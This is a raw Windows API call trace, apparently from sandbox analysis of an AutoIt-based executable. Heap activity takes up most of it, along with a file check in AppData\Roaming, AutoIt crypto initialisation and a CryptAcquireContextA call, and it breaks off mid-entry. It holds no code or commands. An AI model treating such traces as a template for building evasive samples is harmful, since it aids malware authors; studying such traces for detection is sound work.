[0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.893] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.893] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NRdQ.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117382d0, ftCreationTime.dwHighDateTime=0x1d5ec96, ftLastAccessTime.dwLowDateTime=0xce495400, ftLastAccessTime.dwHighDateTime=0x1d5ef72, ftLastWriteTime.dwLowDateTime=0xce495400, ftLastWriteTime.dwHighDateTime=0x1d5ef72, nFileSizeHigh=0x0, nFileSizeLow=0x14af9, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="NRdQ.m4a", cAlternateFileName="")) returned 0xa87490 [0234.894] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0234.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.895] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0234.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0234.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0234.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.950] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0234.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.952] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.952] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.952] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0234.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0234.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0234.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.954] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.954] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0234.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0234.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0234.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0234.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0234.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.955] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0234.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0234.955] RtlAllocateHeap 